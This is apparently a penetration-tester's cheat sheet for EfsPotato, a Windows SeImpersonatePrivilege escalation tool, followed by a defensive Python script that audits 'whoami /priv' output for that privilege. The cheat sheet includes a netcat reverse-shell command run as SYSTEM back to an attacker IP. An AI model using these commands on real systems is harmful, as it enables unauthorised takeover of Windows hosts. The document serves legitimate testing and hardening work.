EfsPotato
Description
EfsPotato is a Windows privilege escalation tool and a variant of the potato family of attacks. It exploits SeImpersonatePrivilege to escalate privileges to NT AUTHORITY\SYSTEM. EfsPotato can be used as an alternative when PrintSpoofer fails.
Usage 1: Verify Execution as SYSTEM
Run a simple command like whoami through EfsPotato to confirm it executes as NT AUTHORITY\SYSTEM.
Command:
.\EfsPotato.exe 'whoami'
Usage 2: Get a Reverse Shell as SYSTEM
Use EfsPotato to execute nc.exe and obtain a reverse shell as NT AUTHORITY\SYSTEM back to the attacker machine.
Command:
.\EfsPotato.exe 'nc.exe 192.168.45.187 445 -e cmd'
Notes
- Requires SeImpersonatePrivilege to be enabled (check with whoami /priv).
- EfsPotato is a good fallback when PrintSpoofer does not work (e.g., timeout errors).
- Transfer EfsPotato.exe and nc.exe to the target machine before execution.
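
The SeImpersonatePrivilege check from the notes above, as an added example (not part of the original page or the EfsPotato project): a Python audit that reads `whoami /priv /fo csv` output collected from a host and reports whether the account holds the privilege. The sample output is constructed, English column headers are assumed, and the watched-privilege list and function names are this example's own choices.

```python
import csv
import io

# Privileges tied to token impersonation; this selection is an assumption of the example.
WATCHED = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

# Constructed sample of `whoami /priv /fo csv` output for a service account.
SAMPLE = '''"Privilege Name","Description","State"
"SeAssignPrimaryTokenPrivilege","Replace a process level token","Disabled"
"SeChangeNotifyPrivilege","Bypass traverse checking","Enabled"
"SeImpersonatePrivilege","Impersonate a client after authentication","Enabled"
"SeCreateGlobalPrivilege","Create global objects","Enabled"
'''


def parse_priv_csv(text):
    """Return {privilege name: state} parsed from `whoami /priv /fo csv` text."""
    reader = csv.DictReader(io.StringIO(text.strip()))
    fields = reader.fieldnames or []
    if "Privilege Name" not in fields or "State" not in fields:
        raise ValueError("not whoami /priv CSV output (English headers expected)")
    return {row["Privilege Name"].strip(): row["State"].strip() for row in reader}


def audit(text, watched=WATCHED):
    """Classify each watched privilege as enabled, held-disabled, or absent."""
    privs = parse_priv_csv(text)
    report = {}
    for name in watched:
        state = privs.get(name)
        if state is None:
            report[name] = "absent"
        elif state.lower() == "enabled":
            report[name] = "enabled"
        else:
            # Present in the token but disabled: the holder can still enable it.
            report[name] = "held-disabled"
    return report


def meets_prerequisite(text):
    """True when SeImpersonatePrivilege is enabled, the condition the notes name."""
    return audit(text)["SeImpersonatePrivilege"] == "enabled"


if __name__ == "__main__":
    for privilege, status in audit(SAMPLE).items():
        print(f"{privilege}: {status}")
```

Accounts reported as enabled or held-disabled are the ones to review when deciding which services need the privilege.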